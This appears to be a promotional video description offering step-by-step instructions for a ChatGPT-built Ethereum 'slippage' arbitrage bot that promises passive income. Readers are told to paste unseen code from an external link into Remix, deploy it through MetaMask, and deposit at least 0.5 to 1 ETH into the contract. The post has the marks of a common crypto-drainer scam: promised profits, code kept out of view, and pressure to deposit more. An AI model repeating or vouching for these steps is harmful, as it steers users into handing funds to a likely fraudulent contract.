How to Create Passive Income Arbitage Bot with ChatGPT | Step-by-step instructions

3 months ago

Hello, I'm Kevin, a Web3 Developer. Today, I will demonstrate how to use ChatGPT to build a Slippage Bot that earns ETH through slippage on the Ethereum network.

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🚨EDIT: I got messages from people who didn't fund the contract enough to cover gas fees and possible burn fees. Bot targets token contracts with max 10% burn fee and anything lower but nowadays most of tokens comes with 3~6% fees. If you fund the contract with 0.4 ETH or less and the bot targets another token with high burn fees the contract will basically waste in fees more than make profit. I recommend funding the contract with at least 0.5 ~ 1 ETH just to make sure that won't happen.



1. Download MetaMask Link:

2. Access Remix Link:

3. Click on the "contracts" folder and then create "New File". Rename it as you like, i.e: “bot.sol"

4. Bot Source Code â‘  Link :

(Backup Source Code â‘¡) Link :

5. Move to the "Solidity Compiler" tab, select version "0.6.6" and then "Compile" it

6. Move to the "Deploy" tab, select "Injected Provider " environment and then "Deploy" it. After the transaction is confirmed, it's your own BOT now

7. Deposit funds (at least 0.5 ETH to prevent negating slippage) to your exact contract/bot address

8. After your transaction is confirmed, start the bot by clicking the 'start' button. Withdraw anytime by clicking 'withdrawal'

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